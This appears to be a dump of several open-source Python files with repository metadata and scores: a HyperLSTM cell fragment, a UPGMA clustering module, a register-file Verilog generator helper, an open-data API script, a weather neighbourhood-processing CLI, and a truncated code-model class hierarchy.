tf.get_variable( 'W_xh', [x_size, 4 * self.num_units], initializer=w_init) w_hh = tf.get_variable( 'W_hh', [self.num_units, 4 * self.num_units], initializer=h_init) concat = tf.concat([x, h], 1) # concat for speed. w_full = tf.concat([w_xh, w_hh], 0) concat = tf.matmul(concat, w_full) #+ bias # live life without garbage. # i = input_gate, j = new_input, f = forget_gate, o = output_gate concat = layer_norm_all(concat, batch_size, 4, h_size, 'ln_all') i, j, f, o = tf.split(concat, 4, 1) if self.use_recurrent_dropout: g = tf.nn.dropout(tf.tanh(j), self.dropout_keep_prob) else: g = tf.tanh(j) new_c = c * tf.sigmoid(f + self.forget_bias) + tf.sigmoid(i) * g new_h = tf.tanh(layer_norm(new_c, h_size, 'ln_c')) * tf.sigmoid(o) return new_h, tf.concat([new_h, new_c], 1) class HyperLSTMCell(contrib_rnn.RNNCell): """HyperLSTM with Ortho Init, Layer Norm, Recurrent Dropout, no Memory Loss. https://arxiv.org/abs/1609.09106 http://blog.otoro.net/2016/09/28/hyper-networks/ """ def __init__(self, num_units, forget_bias=1.0, use_recurrent_dropout=False, dropout_keep_prob=0.90, use_layer_norm=True, hyper_num_units=256, hyper_embedding_size=32, hyper_use_recurrent_dropout=False): """Initialize the Layer Norm HyperLSTM cell. Args: num_units: int, The number of units in the LSTM cell. forget_bias: float, The bias added to forget gates (default 1.0). use_recurrent_dropout: Whether to use Recurrent Dropout (default False) dropout_keep_prob: float, dropout keep probability (default 0.90) use_layer_norm: boolean. (default True) Controls whether we use LayerNorm layers in main LSTM & HyperLSTM cell. hyper_num_units: int, number of units in HyperLSTM cell. (default is 128, recommend experimenting with 256 for larger tasks) hyper_embedding_size: int, size of signals emitted from HyperLSTM cell. (default is 16, recommend trying larger values for large datasets) hyper_use_recurrent_dropout: boolean. (default False) Controls whether HyperLSTM cell also uses recurrent dropout. Recommend turning this on only if hyper_num_units becomes large (>= 512) """ self.num_units = num_units self.forget_bias = forget_bias self.use_recurrent_dropout = use_recurrent_dropout self.dropout_keep_prob = dropout_keep_prob self.use_layer_norm = use_layer_norm self.hyper_num_units = hyper_num_units self.hyper_embedding_size = hyper_embedding_size self.hyper_use_recurrent_dropout = hyper_use_recurrent_dropout self.total_num_units = self.num_units + self.hyper_num_units if self.use_layer_norm: cell_fn = LayerNormLSTMCell else: cell_fn = LSTMCell self.hyper_cell = cell_fn( hyper_num_units, use_recurrent_dropout=hyper_use_recurrent_dropout, dropout_keep_prob=dropout_keep_prob) @property def input_size(self): return self._input_size @property def output_size(self): return self.num_units @property def state_size(self): return 2 * self.total_num_units def get_output(self, state): total_h, unused_total_c = tf.split(state, 2, 1) h = total_h[:, 0:self.num_units] return h def hyper_norm(self, layer, scope='hyper', use_bias=True): num_units = self.num_units embedding_size = self.hyper_embedding_size # recurrent batch norm init trick (https://arxiv.org/abs/1603.09025). init_gamma = 0.10 # cooijmans' da man. with tf.variable_scope(scope): zw = super_linear( self.hyper_output, embedding_size, init_w='constant', weight_start=0.00, use_bias=True, bias_start=1.0, scope='zw') alpha = super_linear( zw, num_units, init_w='constant', weight_start=init_gamma / embedding_size, use_bias=False, scope='alpha') result = tf.multiply(alpha, layer) if use_bias: zb = super_linear( self.hyper_output, embedding_size, init_w='gaussian', weight_start=0.01, use_bias=False, bias_start=0.0, scope='zb') beta = super_linear( zb, num_units, init_w='constant', weight_start=0.00, use_bias=False, scope='beta') result += beta return result def __call__(self, x, state, timestep=0, scope=None): with tf.variable_scope(scope or type(self).__name__): total_h, total_c = tf.split(state, 2, 1) h = total_h[:, 0:self.num_units] c = total_c[:, 0:self.num_units] self.hyper_state = tf.concat( [total_h[:, self.num_units:], total_c[:, self.num_units:]], 1) batch_size = x.get_shape().as_list()[0] x_size = x.get_shape().as_list()[1] self._input_size = x_size w_init = None # uniform h_init = lstm_ortho_initializer(1.0) w_xh = tf.get_variable( 'W_xh', [x_size, 4 * self.num_units], initializer=w_init) w_hh = tf.get_variable( 'W_hh', [self.num_units, 4 * self.num_units], initializer=h_init) bias = tf.get_variable( 'bias', [4 * self.num_units], initializer=tf.constant_initializer(0.0)) # concatenate the input and hidden states for hyperlstm input hyper_input = tf.concat([x, h], 1) hyper_output, hyper_new_state = self.hyper_cell(hyper_input, self.hyper_state) self.hyper_output = hyper_output self.hyper_state = hyper_new_state xh = tf.matmul(x, w_xh) hh = tf.matmul(h, w_hh) # split Wxh contributions ix, jx, fx, ox = tf.split(xh, 4, 1) ix = self.hyper_norm(ix, 'hyper_ix', use_bias=False) jx = self.hyper_norm(jx, 'hyper_jx', use_bias=False) fx = self.hyper_norm(fx, 'hyper_fx', use_bias=False) ox = self.hyper_norm(ox, 'hyper_ox', use_bias=False) # split Whh contributions ih, jh, fh, oh = tf.split(hh, 4, 1) ih = self.hyper_norm(ih, 'hyper_ih', use_bias=True) jh = self.hyper_norm(jh, 'hyper_jh', use_bias=True) fh = self.hyper_norm(fh, 'hyper_fh', use_bias=True) oh = self.hyper_norm(oh, 'hyper_oh', use_bias=True) # split bias ib, jb, fb, ob = tf.split(bias, 4, 0) # bias is to be broadcasted. # i = input_gate, j = new_input, f = forget_gate, o = output_gate i = ix + ih + ib j = jx + jh + jb f = fx + fh + fb o = ox + oh + ob if self.use_layer_norm: concat = tf.concat([i, j, f, o], 1) concat = layer_norm_all(concat, batch_size, 4, self.num_units, 'ln_all') i, j, f, o = tf.split(concat, 4, 1) if self.use_recurrent_dropout: g = tf.nn.dropout(tf.tanh(j), self.dropout_keep_prob) else: g = tf.tanh(j) new_c = c * tf.sigmoid(f + self.forget_bias) + tf.sigmoid(i) * g new_h = tf.tanh(layer_norm(new_c, self.num_units, 'ln_c')) * tf.sigmoid(o) hyper_h, hyper_c = tf.split(hyper_new_state, 2, 1) new_total_h = tf.concat([new_h, hyper_h], 1) new_total_c = tf.concat([new_c, hyper_c], 1) new_total_state = tf.concat([new_total_h, new_total_c], 1) return new_h, new_total_state
2.21875
2
src/cogent3/cluster/UPGMA.py
u6052029/cogent3
0
5585
# usr/bin/env python """Functions to cluster using UPGMA upgma takes an dictionary of pair tuples mapped to distances as input. UPGMA_cluster takes an array and a list of PhyloNode objects corresponding to the array as input. Can also generate this type of input from a DictArray using inputs_from_dict_array function. Both return a PhyloNode object of the UPGMA cluster """ import numpy from numpy import argmin, array, average, diag, ma, ravel, sum, take from cogent3.core.tree import PhyloNode from cogent3.util.dict_array import DictArray __author__ = "<NAME>" __copyright__ = "Copyright 2007-2020, The Cogent Project" __credits__ = ["<NAME>", "<NAME>", "<NAME>"] __license__ = "BSD-3" __version__ = "2020.7.2a" __maintainer__ = "<NAME>" __email__ = "<EMAIL>" __status__ = "Production" numerictypes = numpy.core.numerictypes.sctype2char Float = numerictypes(float) BIG_NUM = 1e305 def upgma(pairwise_distances): """Uses the UPGMA algorithm to cluster sequences pairwise_distances: a dictionary with pair tuples mapped to a distance returns a PhyloNode object of the UPGMA cluster """ darr = DictArray(pairwise_distances) matrix_a, node_order = inputs_from_dict_array(darr) tree = UPGMA_cluster(matrix_a, node_order, BIG_NUM) index = 0 for node in tree.traverse(): if not node.parent: node.name = "root" elif not node.name: node.name = "edge." + str(index) index += 1 return tree def find_smallest_index(matrix): """returns the index of the smallest element in a numpy array for UPGMA clustering elements on the diagonal should first be substituted with a very large number so that they are always larger than the rest if the values in the array.""" # get the shape of the array as a tuple (e.g. (3,3)) shape = matrix.shape # turn into a 1 by x array and get the index of the lowest number matrix1D = ravel(matrix) lowest_index = argmin(matrix1D) # convert the lowest_index derived from matrix1D to one for the original # square matrix and return row_len = shape[0] return divmod(lowest_index, row_len) def condense_matrix(matrix, smallest_index, large_value): """converges the rows and columns indicated by smallest_index Smallest index is returned from find_smallest_index. For both the rows and columns, the values for the two indices are averaged. The resulting vector replaces the first index in the array and the second index is replaced by an array with large numbers so that it is never chosen again with find_smallest_index. """ first_index, second_index = smallest_index # get the rows and make a new vector that has their average rows = take(matrix, smallest_index, 0) new_vector = average(rows, 0) # replace info in the row and column for first index with new_vector matrix[first_index] = new_vector matrix[:, first_index] = new_vector # replace the info in the row and column for the second index with # high numbers so that it is ignored matrix[second_index] = large_value matrix[:, second_index] = large_value return matrix def condense_node_order(matrix, smallest_index, node_order): """condenses two nodes in node_order based on smallest_index info This function is used to create a tree while condensing a matrix with the condense_matrix function. The smallest_index is retrieved with find_smallest_index. The first index is replaced with a node object that combines the two nodes corresponding to the indices in node order. The second index in smallest_index is replaced with None. Also sets the branch length of the nodes to 1/2 of the distance between the nodes in the matrix""" index1, index2 = smallest_index node1 = node_order[index1] node2 = node_order[index2] # get the distance between the nodes and assign 1/2 the distance to the # lengthproperty of each node distance = matrix[index1, index2] nodes = [node1, node2] d = distance / 2.0 for n in nodes: if n.children: n.length = d - n.children[0].TipLength else: n.length = d n.TipLength = d # combine the two nodes into a new PhyloNode object new_node = PhyloNode() new_node.children.append(node1) new_node.children.append(node2) node1.parent = new_node node2.parent = new_node # replace the object at index1 with the combined node node_order[index1] = new_node # replace the object at index2 with None node_order[index2] = None return node_order def UPGMA_cluster(matrix, node_order, large_number): """cluster with UPGMA matrix is a numpy array. node_order is a list of PhyloNode objects corresponding to the matrix. large_number will be assigned to the matrix during the process and should be much larger than any value already in the matrix. WARNING: Changes matrix in-place. WARNING: Expects matrix to already have diagonals assigned to large_number before this function is called. """ num_entries = len(node_order) tree = None for i in range(num_entries - 1): smallest_index = find_smallest_index(matrix) index1, index2 = smallest_index # if smallest_index is on the diagonal set the diagonal to large_number if index1 == index2: matrix[diag([True] * len(matrix))] = large_number smallest_index = find_smallest_index(matrix) row_order = condense_node_order(matrix, smallest_index, node_order) matrix = condense_matrix(matrix, smallest_index, large_number) tree = node_order[smallest_index[0]] return tree def inputs_from_dict_array(darr): """makes inputs for UPGMA_cluster from a DictArray object """ darr.array += numpy.eye(darr.shape[0]) * BIG_NUM nodes = list(map(PhyloNode, darr.keys())) return darr.array, nodes
3.140625
3
src/python/make_store_entry.py
kf7lsu/RegfileCompiler-public
0
5586
#this code will generate the structural verilog for a single entry in the register file #takes in the output file manager, the entry number, the number of bits, the number of reads, and the width of the #tristate buffers on the read outputs #expects the same things as make_store_cell, ensure code is valid there #<NAME> #EE 526 #4/20/21 from make_store_cell import make_store_cell def make_store_entry(out_file, entry_number, bits, reads, buff_width, regfile_num): #just need to create the correct number of bits #this and the make_store_array are going to be pretty simple for bit in range(bits): make_store_cell(out_file, entry_number, bit, reads, buff_width, regfile_num) return if __name__ == '__main__': f = open('store_entry_test.txt', 'w') rows = 4 cols = 2 reads = 2 for row in range(rows): make_store_entry(f, row, cols, reads, 1, 0) f.close()
2.953125
3
module1/api.py
oceandelee/tac
0
5587
"""API for AVB""" import json import sys import requests def actualite_found (): osm = "https://opendata.bruxelles.be/api/datasets/1.0/search/?q=" data = { "nhits":0, "parameters":{ "dataset":"actualites-ville-de-bruxelles", "timezone":"UTC", "q":"actualite", "language": "fr", "rows":10, "start":0, "sort":[ "published" ] , "format":"json" } , "records":[] } resp = requests.get(osm, data) if resp.status_code == 200: print(resp.json()["datasets"][0]["metas"]) else: print("actualite not found") return resp def get_result(resp,n,attribut): metas = resp.json()["datasets"][n]["metas"] return metas[attribut] def nb_result(resp): return len(resp.json()["datasets"]) #Example of use if __name__ == "__main__": resp = actualite_found() result = get_result(resp,2,"description") print(result) print(nb_result(resp))
3.09375
3
improver/cli/nbhood.py
cpelley/improver
77
5588
<reponame>cpelley/improver #!/usr/bin/env python # -*- coding: utf-8 -*- # ----------------------------------------------------------------------------- # (C) British Crown Copyright 2017-2021 Met Office. # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are met: # # * Redistributions of source code must retain the above copyright notice, this # list of conditions and the following disclaimer. # # * Redistributions in binary form must reproduce the above copyright notice, # this list of conditions and the following disclaimer in the documentation # and/or other materials provided with the distribution. # # * Neither the name of the copyright holder nor the names of its # contributors may be used to endorse or promote products derived from # this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE # IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE # ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE # LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR # CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF # SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS # INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN # CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) # ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE # POSSIBILITY OF SUCH DAMAGE. """Script to run neighbourhood processing.""" from improver import cli from improver.constants import DEFAULT_PERCENTILES @cli.clizefy @cli.with_output def process( cube: cli.inputcube, mask: cli.inputcube = None, *, neighbourhood_output, neighbourhood_shape, radii: cli.comma_separated_list, lead_times: cli.comma_separated_list = None, degrees_as_complex=False, weighted_mode=False, area_sum=False, remask=False, percentiles: cli.comma_separated_list = DEFAULT_PERCENTILES, halo_radius: float = None, ): """Runs neighbourhood processing. Apply the requested neighbourhood method via the NeighbourhoodProcessing plugin to a Cube. Args: cube (iris.cube.Cube): The Cube to be processed. mask (iris.cube.Cube): A cube to mask the input cube. The data should contain 1 for usable points and 0 for discarded points. Only supported with square neighbourhoods. (Optional) neighbourhood_output (str): The form of the results generated using neighbourhood processing. If "probabilities" is selected, the mean probability with a neighbourhood is calculated. If "percentiles" is selected, then the percentiles are calculated with a neighbourhood. Calculating percentiles from a neighbourhood is only supported for a circular neighbourhood. Options: "probabilities", "percentiles". neighbourhood_shape (str): Name of the neighbourhood method to use. Only a "circular" neighbourhood shape is applicable for calculating "percentiles" output. Options: "circular", "square". radii (list of float): The radius or a list of radii in metres of the neighbourhood to apply. If it is a list, it must be the same length as lead_times, which defines at which lead time to use which nbhood radius. The radius will be interpolated for intermediate lead times. lead_times (list of int): The lead times in hours that correspond to the radii to be used. If lead_times are set, radii must be a list the same length as lead_times. degrees_as_complex (bool): Include this option to process angles as complex numbers. Not compatible with circular kernel or percentiles. weighted_mode (bool): Include this option to set the weighting to decrease with radius. Otherwise a constant weighting is assumed. weighted_mode is only applicable for calculating "probability" neighbourhood output using the circular kernel. area_sum (bool): Return sum rather than fraction over the neighbourhood area. remask (bool): Include this option to apply the original un-neighbourhood processed mask to the neighbourhood processed cube. Otherwise the original un-neighbourhood processed mask is not applied. Therefore, the neighbourhood processing may result in values being present in area that were originally masked. percentiles (float): Calculates value at the specified percentiles from the neighbourhood surrounding each grid point. This argument has no effect if the output is probabilities. halo_radius (float): Set this radius in metres to define the excess halo to clip. Used where a larger grid was defined than the standard grid and we want to clip the grid back to the standard grid. Otherwise no clipping is applied. Returns: iris.cube.Cube: A processed Cube. Raises: RuntimeError: If weighted_mode is used with the wrong neighbourhood_output. RuntimeError: If degree_as_complex is used with neighbourhood_output='percentiles'. RuntimeError: If degree_as_complex is used with neighbourhood_shape='circular'. """ from improver.nbhood import radius_by_lead_time from improver.nbhood.nbhood import ( GeneratePercentilesFromANeighbourhood, NeighbourhoodProcessing, ) from improver.utilities.pad_spatial import remove_cube_halo from improver.wind_calculations.wind_direction import WindDirection sum_or_fraction = "sum" if area_sum else "fraction" if neighbourhood_output == "percentiles": if weighted_mode: raise RuntimeError( "weighted_mode cannot be used with" 'neighbourhood_output="percentiles"' ) if degrees_as_complex: raise RuntimeError("Cannot generate percentiles from complex " "numbers") if neighbourhood_shape == "circular": if degrees_as_complex: raise RuntimeError( "Cannot process complex numbers with circular neighbourhoods" ) if degrees_as_complex: # convert cube data into complex numbers cube.data = WindDirection.deg_to_complex(cube.data) radius_or_radii, lead_times = radius_by_lead_time(radii, lead_times) if neighbourhood_output == "probabilities": result = NeighbourhoodProcessing( neighbourhood_shape, radius_or_radii, lead_times=lead_times, weighted_mode=weighted_mode, sum_or_fraction=sum_or_fraction, re_mask=remask, )(cube, mask_cube=mask) elif neighbourhood_output == "percentiles": result = GeneratePercentilesFromANeighbourhood( neighbourhood_shape, radius_or_radii, lead_times=lead_times, percentiles=percentiles, )(cube) if degrees_as_complex: # convert neighbourhooded cube back to degrees result.data = WindDirection.complex_to_deg(result.data) if halo_radius is not None: result = remove_cube_halo(result, halo_radius) return result
1.382813
1
bonsai/model.py
ipa-mirb/bonsai
0
5589
<gh_stars>0 #Copyright (c) 2017 <NAME> # #Permission is hereby granted, free of charge, to any person obtaining a copy #of this software and associated documentation files (the "Software"), to deal #in the Software without restriction, including without limitation the rights #to use, copy, modify, merge, publish, distribute, sublicense, and/or sell #copies of the Software, and to permit persons to whom the Software is #furnished to do so, subject to the following conditions: #The above copyright notice and this permission notice shall be included in #all copies or substantial portions of the Software. #THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR #IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, #FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE #AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER #LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, #OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN #THE SOFTWARE. ############################################################################### # Language Model ############################################################################### class CodeEntity(object): """Base class for all programming entities. All code objects have a file name, a line number, a column number, a programming scope (e.g. the function or code block they belong to) and a parent object that should have some variable or collection holding this object. """ def __init__(self, scope, parent): """Base constructor for code objects. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. """ self.scope = scope self.parent = parent self.file = None self.line = None self.column = None def walk_preorder(self): """Iterates the program tree starting from this object, going down.""" yield self for child in self._children(): for descendant in child.walk_preorder(): yield descendant def filter(self, cls, recursive=False): """Retrieves all descendants (including self) that are instances of a given class. Args: cls (class): The class to use as a filter. Kwargs: recursive (bool): Whether to descend recursively down the tree. """ source = self.walk_preorder if recursive else self._children return [ codeobj for codeobj in source() if isinstance(codeobj, cls) ] def _afterpass(self): """Finalizes the construction of a code entity.""" pass def _validity_check(self): """Check whether this object is a valid construct.""" return True def _children(self): """Yield all direct children of this object.""" # The default implementation has no children, and thus should return # an empty iterator. return iter(()) def _lookup_parent(self, cls): """Lookup a transitive parent object that is an instance of a given class.""" codeobj = self.parent while codeobj is not None and not isinstance(codeobj, cls): codeobj = codeobj.parent return codeobj def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ return (' ' * indent) + self.__str__() def ast_str(self, indent=0): """Return a minimal string to print a tree-like structure. Kwargs: indent (int): The number of indentation levels. """ line = self.line or 0 col = self.column or 0 name = type(self).__name__ spell = getattr(self, 'name', '[no spelling]') result = ' ({})'.format(self.result) if hasattr(self, 'result') else '' prefix = indent * '| ' return '{}[{}:{}] {}{}: {}'.format(prefix, line, col, name, result, spell) def __str__(self): """Return a string representation of this object.""" return self.__repr__() def __repr__(self): """Return a string representation of this object.""" return '[unknown]' class CodeStatementGroup(object): """This class is meant to provide common utility methods for objects that group multiple program statements together (e.g. functions, code blocks). It is not meant to be instantiated directly, only used for inheritance purposes. It defines the length of a statement group, and provides methods for integer-based indexing of program statements (as if using a list). """ def statement(self, i): """Return the *i*-th statement from the object's `body`.""" return self.body.statement(i) def statement_after(self, i): """Return the statement after the *i*-th one, or `None`.""" try: return self.statement(i + 1) except IndexError as e: return None def __getitem__(self, i): """Return the *i*-th statement from the object's `body`.""" return self.statement(i) def __len__(self): """Return the length of the statement group.""" return len(self.body) # ----- Common Entities ------------------------------------------------------- class CodeVariable(CodeEntity): """This class represents a program variable. A variable typically has a name, a type (`result`) and a value (or `None` for variables without a value or when the value is unknown). Additionally, a variable has an `id` which uniquely identifies it in the program (useful to resolve references), a list of references to it and a list of statements that write new values to the variable. If the variable is a *member*/*field*/*attribute* of an object, `member_of` should contain a reference to such object, instead of `None`. """ def __init__(self, scope, parent, id, name, result): """Constructor for variables. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. id: An unique identifier for this variable. name (str): The name of the variable in the program. result (str): The type of the variable in the program. """ CodeEntity.__init__(self, scope, parent) self.id = id self.name = name self.result = result self.value = None self.member_of = None self.references = [] self.writes = [] @property def is_definition(self): return True @property def is_local(self): """Whether this is a local variable. In general, a variable is *local* if its containing scope is a statement (e.g. a block), or a function, given that the variable is not one of the function's parameters. """ return (isinstance(self.scope, CodeStatement) or (isinstance(self.scope, CodeFunction) and self not in self.scope.parameters)) @property def is_global(self): """Whether this is a global variable. In general, a variable is *global* if it is declared directly under the program's global scope or a namespace. """ return isinstance(self.scope, (CodeGlobalScope, CodeNamespace)) @property def is_parameter(self): """Whether this is a function parameter.""" return (isinstance(self.scope, CodeFunction) and self in self.scope.parameters) @property def is_member(self): """Whether this is a member/attribute of a class or object.""" return isinstance(self.scope, CodeClass) def _add(self, codeobj): """Add a child (value) to this object.""" assert isinstance(codeobj, CodeExpression.TYPES) self.value = codeobj def _children(self): """Yield all direct children of this object.""" if isinstance(self.value, CodeEntity): yield self.value def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ return '{}{} {} = {}'.format(' ' * indent, self.result, self.name, pretty_str(self.value)) def __repr__(self): """Return a string representation of this object.""" return '[{}] {} = ({})'.format(self.result, self.name, self.value) class CodeFunction(CodeEntity, CodeStatementGroup): """This class represents a program function. A function typically has a name, a return type (`result`), a list of parameters and a body (a code block). It also has an unique `id` that identifies it in the program and a list of references to it. If a function is a method of some class, its `member_of` should be set to the corresponding class. """ def __init__(self, scope, parent, id, name, result, definition=True): """Constructor for functions. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. id: An unique identifier for this function. name (str): The name of the function in the program. result (str): The return type of the function in the program. """ CodeEntity.__init__(self, scope, parent) self.id = id self.name = name self.result = result self.parameters = [] self.body = CodeBlock(self, self, explicit=True) self.member_of = None self.references = [] self._definition = self if definition else None @property def is_definition(self): """Whether this is a function definition or just a declaration.""" return self._definition is self @property def is_constructor(self): """Whether this function is a class constructor.""" return self.member_of is not None def _add(self, codeobj): """Add a child (statement) to this object.""" assert isinstance(codeobj, (CodeStatement, CodeExpression)) self.body._add(codeobj) def _children(self): """Yield all direct children of this object.""" for codeobj in self.parameters: yield codeobj for codeobj in self.body._children(): yield codeobj def _afterpass(self): """Assign a function-local index to each child object and register write operations to variables. This should only be called after the object is fully built. """ if hasattr(self, '_fi'): return fi = 0 for codeobj in self.walk_preorder(): codeobj._fi = fi fi += 1 if isinstance(codeobj, CodeOperator) and codeobj.is_assignment: if codeobj.arguments and isinstance(codeobj.arguments[0], CodeReference): var = codeobj.arguments[0].reference if isinstance(var, CodeVariable): var.writes.append(codeobj) def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ spaces = ' ' * indent params = ', '.join(map(lambda p: p.result + ' ' + p.name, self.parameters)) if self.is_constructor: pretty = '{}{}({}):\n'.format(spaces, self.name, params) else: pretty = '{}{} {}({}):\n'.format(spaces, self.result, self.name, params) if self._definition is not self: pretty += spaces + ' [declaration]' else: pretty += self.body.pretty_str(indent + 2) return pretty def __repr__(self): """Return a string representation of this object.""" params = ', '.join(map(str, self.parameters)) return '[{}] {}({})'.format(self.result, self.name, params) class CodeClass(CodeEntity): """This class represents a program class for object-oriented languages. A class typically has a name, an unique `id`, a list of members (variables, functions), a list of superclasses, and a list of references. If a class is defined within another class (inner class), it should have its `member_of` set to the corresponding class. """ def __init__(self, scope, parent, id_, name, definition=True): """Constructor for classes. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. id: An unique identifier for this class. name (str): The name of the class in the program. """ CodeEntity.__init__(self, scope, parent) self.id = id_ self.name = name self.members = [] self.superclasses = [] self.member_of = None self.references = [] self._definition = self if definition else None @property def is_definition(self): """Whether this is a definition or a declaration of the class.""" return self._definition is self def _add(self, codeobj): """Add a child (function, variable, class) to this object.""" assert isinstance(codeobj, (CodeFunction, CodeVariable, CodeClass)) self.members.append(codeobj) codeobj.member_of = self def _children(self): """Yield all direct children of this object.""" for codeobj in self.members: yield codeobj def _afterpass(self): """Assign the `member_of` of child members and call their `_afterpass()`. This should only be called after the object is fully built. """ for codeobj in self.members: if not codeobj.is_definition: if not codeobj._definition is None: codeobj._definition.member_of = self codeobj._afterpass() def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ spaces = ' ' * indent pretty = spaces + 'class ' + self.name if self.superclasses: superclasses = ', '.join(self.superclasses) pretty += '(' + superclasses + ')' pretty += ':\n' if self.members: pretty += '\n\n'.join( c.pretty_str(indent + 2) for c in self.members ) else: pretty += spaces + ' [declaration]' return pretty def __repr__(self): """Return a string representation of this object.""" return '[class {}]'.format(self.name) class CodeNamespace(CodeEntity): """This class represents a program namespace. A namespace is a concept that is explicit in languages such as C++, but less explicit in many others. In Python, the closest thing should be a module. In Java, it may be the same as a class, or non-existent. A namespace typically has a name and a list of children objects (variables, functions or classes). """ def __init__(self, scope, parent, name): """Constructor for namespaces. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. name (str): The name of the namespace in the program. """ CodeEntity.__init__(self, scope, parent) self.name = name self.children = [] def _add(self, codeobj): """Add a child (namespace, function, variable, class) to this object.""" assert isinstance(codeobj, (CodeNamespace, CodeClass, CodeFunction, CodeVariable)) self.children.append(codeobj) def _children(self): """Yield all direct children of this object.""" for codeobj in self.children: yield codeobj def _afterpass(self): """Call the `_afterpass()` of child objects. This should only be called after the object is fully built. """ for codeobj in self.children: codeobj._afterpass() def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ spaces = ' ' * indent pretty = '{}namespace {}:\n'.format(spaces, self.name) pretty += '\n\n'.join(c.pretty_str(indent + 2) for c in self.children) return pretty def __repr__(self): """Return a string representation of this object.""" return '[namespace {}]'.format(self.name) class CodeGlobalScope(CodeEntity): """This class represents the global scope of a program. The global scope is the root object of a program. If there are no better candidates, it is the `scope` and `parent` of all other objects. It is also the only object that does not have a `scope` or `parent`. """ def __init__(self): """Constructor for global scope objects.""" CodeEntity.__init__(self, None, None) self.children = [] def _add(self, codeobj): """Add a child (namespace, function, variable, class) to this object.""" assert isinstance(codeobj, (CodeNamespace, CodeClass, CodeFunction, CodeVariable)) self.children.append(codeobj) def _children(self): """Yield all direct children of this object.""" for codeobj in self.children: yield codeobj def _afterpass(self): """Call the `_afterpass()` of child objects. This should only be called after the object is fully built. """ for codeobj in self.children: codeobj._afterpass() def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ return '\n\n'.join( codeobj.pretty_str(indent=indent) for codeobj in self.children ) # ----- Expression Entities --------------------------------------------------- class CodeExpression(CodeEntity): """Base class for expressions within a program. Expressions can be of many types, including literal values, operators, references and function calls. This class is meant to be inherited from, and not instantiated directly. An expression typically has a name (e.g. the name of the function in a function call) and a type (`result`). Also, an expression should indicate whether it is enclosed in parentheses. """ def __init__(self, scope, parent, name, result, paren=False): """Constructor for expressions. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. name (str): The name of the expression in the program. result (str): The return type of the expression in the program. Kwargs: paren (bool): Whether the expression is enclosed in parentheses. """ CodeEntity.__init__(self, scope, parent) self.name = name self.result = result self.parenthesis = paren @property def function(self): """The function where this expression occurs.""" return self._lookup_parent(CodeFunction) @property def statement(self): """The statement where this expression occurs.""" return self._lookup_parent(CodeStatement) def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ if self.parenthesis: return (' ' * indent) + '(' + self.name + ')' return (' ' * indent) + self.name def __repr__(self): """Return a string representation of this object.""" return '[{}] {}'.format(self.result, self.name) class SomeValue(CodeExpression): """This class represents an unknown value for diverse primitive types.""" def __init__(self, result): """Constructor for unknown values.""" CodeExpression.__init__(self, None, None, result, result) def _children(self): """Yield all the children of this object, that is no children.""" return iter(()) SomeValue.INTEGER = SomeValue("int") SomeValue.FLOATING = SomeValue("float") SomeValue.CHARACTER = SomeValue("char") SomeValue.STRING = SomeValue("string") SomeValue.BOOL = SomeValue("bool") class CodeLiteral(CodeExpression): """Base class for literal types not present in Python. This class is meant to represent a literal whose type is not numeric, string or boolean, as bare Python literals are used for those. A literal has a value (e.g. a list `[1, 2, 3]`) and a type (`result`), and could be enclosed in parentheses. It does not have a name. """ def __init__(self, scope, parent, value, result, paren=False): """Constructor for literals. As literals have no name, a constant string is used instead. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. value (CodeExpression|CodeExpression[]): This literal's value. result (str): The return type of the literal in the program. Kwargs: paren (bool): Whether the literal is enclosed in parentheses. """ CodeExpression.__init__(self, scope, parent, 'literal', result, paren) self.value = value def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ if self.parenthesis: return '{}({})'.format(' ' * indent, pretty_str(self.value)) return pretty_str(self.value, indent=indent) 